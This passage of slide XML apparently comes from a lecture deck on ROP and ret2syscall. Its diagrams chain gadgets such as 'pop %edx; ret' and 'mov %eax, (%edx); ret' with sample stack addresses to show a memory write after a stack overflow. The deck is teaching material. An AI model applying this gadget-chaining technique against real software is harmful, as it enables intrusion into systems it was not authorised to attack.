                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop %edx; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1619" name="Shape 1619"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="3224200"/>
            <a:ext cx="35812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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>xor %eax, %eax; ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1620" name="Shape 1620"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="2481651"/>
            <a:ext cx="35812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mov %eax, (%edx); ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1621" name="Shape 1621"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162473" y="2865000"/>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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1622" name="Shape 1622"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8059740" y="3069800"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1623" name="Shape 1623"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="5563900"/>
            <a:ext cx="35812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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1624" name="Shape 1624"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1623" idx="0"/>
            <a:endCxn id="1618" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="5188700"/>
            <a:ext cx="0" cy="375200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1625" name="Shape 1625"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1618" idx="0"/>
            <a:endCxn id="1619" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="3633733"/>
            <a:ext cx="0" cy="1145200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1626" name="Shape 1626"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1619" idx="0"/>
            <a:endCxn id="1620" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="2891400"/>
            <a:ext cx="0" cy="332800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1627" name="Shape 1627"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1614" idx="1"/>
            <a:endCxn id="1618" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="4983717"/>
            <a:ext cx="2271200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1628" name="Shape 1628"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1616" idx="1"/>
            <a:endCxn id="1619" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="3428917"/>
            <a:ext cx="2271200" cy="27600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1629" name="Shape 1629"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1617" idx="1"/>
            <a:endCxn id="1620" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="2686467"/>
            <a:ext cx="2271200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1630" name="Shape 1630"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320807" y="3254927"/>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EIP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1631" name="Shape 1631"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218073" y="3459727"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1632" name="Shape 1632"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775833" y="4001567"/>
            <a:ext cx="2165200" cy="4096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kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%edx = value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1633" name="Shape 1633"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="1534600"/>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0x41414141</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="矩形 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D761A85A-D3BF-4345-9335-EB32FAE54EEF}"/>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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 1589">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AF70847-1139-4140-A2C8-8DD44EF5DE69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299153" y="890764"/>
            <a:ext cx="8298180" cy="763588"/>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solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(Return Oriented Programming)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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637"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1639" name="Shape 1639"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="4601917"/>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0x08052318</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1640" name="Shape 1640"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3838317"/>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value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1641" name="Shape 1641"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3074717"/>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0x0809951f</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1642" name="Shape 1642"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="2304667"/>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0x080788c1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1643" name="Shape 1643"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="4778933"/>
            <a:ext cx="35812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pop %edx; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1644" name="Shape 1644"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="3224200"/>
            <a:ext cx="3581200" cy="409600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>xor %eax, %eax; ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1645" name="Shape 1645"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="2481651"/>
            <a:ext cx="35812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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov %eax, (%edx); ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1646" name="Shape 1646"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162473" y="2153800"/>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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1647" name="Shape 1647"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8059740" y="2358600"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1648" name="Shape 1648"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="5563900"/>
            <a:ext cx="35812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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1649" name="Shape 1649"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1648" idx="0"/>
            <a:endCxn id="1643" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="5188700"/>
            <a:ext cx="0" cy="375200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1650" name="Shape 1650"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1643" idx="0"/>
            <a:endCxn id="1644" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="3633733"/>
            <a:ext cx="0" cy="1145200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1651" name="Shape 1651"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1644" idx="0"/>
            <a:endCxn id="1645" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="2891400"/>
            <a:ext cx="0" cy="332800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1652" name="Shape 1652"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1639" idx="1"/>
            <a:endCxn id="1643" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="4983717"/>
            <a:ext cx="2271200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1653" name="Shape 1653"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1641" idx="1"/>
            <a:endCxn id="1644" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="3428917"/>
            <a:ext cx="2271200" cy="27600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1654" name="Shape 1654"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1642" idx="1"/>
            <a:endCxn id="1645" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="2686467"/>
            <a:ext cx="2271200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1655" name="Shape 1655"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320807" y="2442127"/>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EIP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1656" name="Shape 1656"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218073" y="2646927"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1657" name="Shape 1657"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775833" y="4001567"/>
            <a:ext cx="2165200" cy="4096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%edx = value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1658" name="Shape 1658"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775833" y="2852900"/>
            <a:ext cx="2165200" cy="4096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%eax = 0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
